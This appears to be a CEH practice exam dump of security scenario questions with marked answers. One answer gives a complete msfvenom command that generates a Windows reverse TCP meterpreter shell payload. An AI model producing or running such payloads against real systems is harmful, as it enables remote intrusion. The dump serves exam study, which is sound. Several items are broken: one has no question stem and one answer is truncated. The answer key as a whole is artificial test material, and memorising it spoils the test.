






Test v12 CEH QUESTIONS WITH ANSWERS
Typology: Exams
Susan, a software developer, wants her web API to update other applications with the latest information. For this purpose, she uses a user-defined HTTP callback or push APIs that are raised based on trigger events: when invoked, this feature supplies data to other applications so that users can instantly receive real-time information. Which of the following techniques is employed by Susan? - CORRECT ANSWERS ✔✔Webhooks

Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task? - CORRECT ANSWERS ✔✔arp ping scan

Alice, a professional hacker, targeted an organization's cloud services. She infiltrated the target's MSP provider by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization. Which of the following cloud attacks did Alice perform in the above scenario? - CORRECT ANSWERS ✔✔Cloud hopper attack

Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks. What is the component of the Docker architecture used by Annie in the above scenario? - CORRECT ANSWERS ✔✔Docker daemon

What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows? - CORRECT ANSWERS ✔✔msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

Which of the following information security controls creates an appealing isolated environment for hackers to prevent them from compromising critical targets while simultaneously gathering information about the hacker? - CORRECT ANSWERS ✔✔Honeypot

Infecting a system with malware and using phishing to gain credentials to a system or web application are examples of which phase of the ethical hacking methodology? - CORRECT ANSWERS ✔✔Gaining access

Which of the following regulations is mostly violated? - CORRECT ANSWERS ✔✔HIPAA/PHI

What is the common name for a vulnerability disclosure program opened by companies in platforms such as HackerOne? - CORRECT ANSWERS ✔✔Bug bounty program

John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this type of encryption? - CORRECT ANSWERS ✔✔Use Marie's public key to encrypt the message.

Attacker Steve targeted an organization's network with the aim of redirecting the company's web traffic to another malicious website. To achieve this goal, Steve performed DNS cache poisoning by exploiting the vulnerabilities in the DNS server software and modified the original IP address of the target website to that of a fake website. What is the technique employed by Steve to gather information for identity theft? - CORRECT ANSWERS ✔✔Pharming

Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its systems by sending malicious emails. For this purpose, he uses a tool to track the emails of the target and extracts information such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources. He also checks if an email address was leaked using the haveibeenpwned.com API. Which of the following tools is used by Wilson in the above scenario? - CORRECT ANSWERS ✔✔infoga

While testing a web application in development, you notice that the web server does not properly ignore the "dot dot slash" (../) character string and instead returns the file listing of a folder structure of the server. What kind of attack is possible in this scenario? - CORRECT ANSWERS ✔✔Directory traversal

Henry is a cyber security specialist hired by BlackEye - Cyber security solutions. He was tasked with discovering the operating system (OS) of a host. He used the Unicornscan tool to discover the OS of the target system. As a result, he obtained a TTL value, which indicates that the target system is running a Windows OS. Identify the TTL value Henry obtained, which indicates that the target OS is Windows. - CORRECT ANSWERS ✔✔128

Ethical hacker Jane Doe is attempting to crack the password of the head of the IT department of ABC company. She is utilizing a rainbow table and notices upon entering a password that extra characters are added to the password after submitting. What countermeasure is the company using to protect against rainbow tables? - CORRECT ANSWERS ✔✔Password salting

Bob, an attacker, has managed to access a target IoT device. He employed an online tool to gather information related to the model of the IoT device and the certifications granted to it. Which of the following tools did Bob employ to gather the above information? - CORRECT ANSWERS ✔✔FCC ID search

Larry, a security professional in an organization, has noticed some abnormalities in the user accounts on a web server. To thwart evolving attacks, he decided to harden the security of the web server by adopting countermeasures to secure the accounts on the web server. Which of the following countermeasures must Larry implement to secure the user accounts on the web server? - CORRECT ANSWERS ✔✔Limit the administrator or root-level access to the minimum number of users

Bella, a security professional working at an IT firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. To address this situation, Bella implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by Bella? - CORRECT ANSWERS ✔✔FTPS

Which of the following Bluetooth hacking techniques refers to the theft of information from a wireless device through Bluetooth? - CORRECT ANSWERS ✔✔Bluesnarfing

Dorian is sending a digitally signed email to Polly. With which key is Dorian signing this message and how is Polly validating it? - CORRECT ANSWERS ✔✔Dorian is signing the message with his private key, and Polly will verify that the message came from Dorian by using Dorian's public key.

An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption, the organization decided to install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which of the following tools must the organization employ to protect its critical infrastructure? - CORRECT ANSWERS ✔✔Flowmon

By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext. Which file do you have to clean to clear the password? - CORRECT ANSWERS ✔✔.bash_history

In the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium vulnerability fall in? - CORRECT ANSWERS ✔✔4.0-6.

above scenario? - CORRECT ANSWERS ✔✔Server-side request forgery (SSRF) attack

A security analyst uses Zenmap to perform an ICMP timestamp ping scan to acquire information related to the current time from the target host machine. Which of the following Zenmap options must the analyst use to perform the ICMP timestamp ping scan? - CORRECT ANSWERS ✔✔-PP

What is the proper response for a NULL scan if the port is closed? - CORRECT ANSWERS ✔✔RST